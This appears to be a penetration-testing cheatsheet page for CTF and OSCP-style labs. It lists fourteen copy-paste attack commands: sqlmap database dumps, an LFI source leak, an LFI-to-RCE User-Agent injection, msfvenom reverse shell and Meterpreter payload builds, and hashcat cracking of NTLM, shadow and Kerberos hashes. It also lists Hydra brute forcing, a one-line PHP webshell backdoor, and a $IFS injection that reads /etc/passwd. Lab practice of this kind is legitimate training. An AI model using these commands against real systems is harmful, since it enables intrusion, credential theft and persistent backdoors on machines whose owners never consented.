Exploitation & Payloads cheatsheet
14 copy-paste commands for exploitation & payloads in CTFs and OSCP-style labs. Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
SQLmap Automated Injection & Database Dump
Batch automated SQL injection extraction with risk and level escalation.
sqlmap -u "http://{TARGET_IP}/item.php?id=1" --batch --random-agent --level=3 --risk=2 --dbssqlmapsqlidatabasedump
SQLmap Target Saved HTTP Request File
Pass raw saved Burp Suite POST request file to extract DB tables.
sqlmap -r request.txt -p username --batch --current-db --dumpsqlmapburppostsqli
PHP Filter Base64 LFI Wrapper
Read source code of PHP scripts through base64 conversion filter.
http://{TARGET_IP}/index.php?page=php://filter/convert.base64-encode/resource=config.phplfiphp-filtersource-leak
LFI to RCE via Apache /proc/self/environ
Inject User-Agent payload into environment file for code execution.
curl -s -H "User-Agent: <?php system('id'); ?>" "http://{TARGET_IP}/view.php?file=/proc/self/environ"lfirceproc
msfvenom Linux x64 Staged Reverse TCP ELF
Compile standalone ELF reverse shell binary for x64 Linux target.
msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o shell.elfmsfvenompayloadelflinux
msfvenom Windows x64 Reverse Meterpreter EXE
Generate raw Windows x64 executable reverse meterpreter.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o payload.exemsfvenommeterpreterexewindows
Hashcat NTLM Hashes (Mode 1000)
High-speed GPU cracking of Windows NTLM hashes dumped from SAM or NTDS.dit.
hashcat -m 1000 ntlm.hashes /usr/share/wordlists/rockyou.txt -Ohashcatntlmcrackingwindows
Hashcat Linux /etc/shadow Hashes (Mode 1800)
Crack SHA512crypt ($6$) passwords dumped from Linux /etc/shadow.
hashcat -m 1800 shadow.hashes /usr/share/wordlists/rockyou.txt -Ohashcatshadowsha512linux
Hashcat Kerberos 5 TGS (Mode 13100)
Crack Kerberoasted Service Principal Name tickets to reveal service account passwords.
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -Ohashcatkerberoasttgsactive-directory
Hashcat Kerberos 5 AS-REP (Mode 18200)
Crack AS-REP hashes captured for accounts with Kerberos preauthentication disabled.
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -Ohashcatasrepkerberosactive-directory
Hydra Multi-Threaded SSH Brute Force
Brute-force SSH service credentials using rockyou password list.
hydra -l {USER} -P /usr/share/wordlists/rockyou.txt {TARGET_IP} ssh -t 4hydrasshbruteforce
Hydra Web Login Form Brute Force
Target HTTP POST web login endpoint with username and password dictionary.
hydra -l admin -P /usr/share/wordlists/rockyou.txt {TARGET_IP} http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials"hydrahttpwebbruteforce
Minimal PHP Single-Line Backdoor
Lightweight PHP command execution backdoor for quick web root persistence.
echo '<?php system($_GET["cmd"]); ?>' > shell.phpwebshellphpbackdoor
Command Injection Space Filter Bypass ($IFS)
Bypass space character filtering in vulnerable web commands using bash internal field separator.
cat$IFS/etc/passwdcmd-injectionbypassfilterlinux
Use these commands with your values filled in. ZeroBox interpolates target IP, domain and credentials into every command. Open the cheatsheet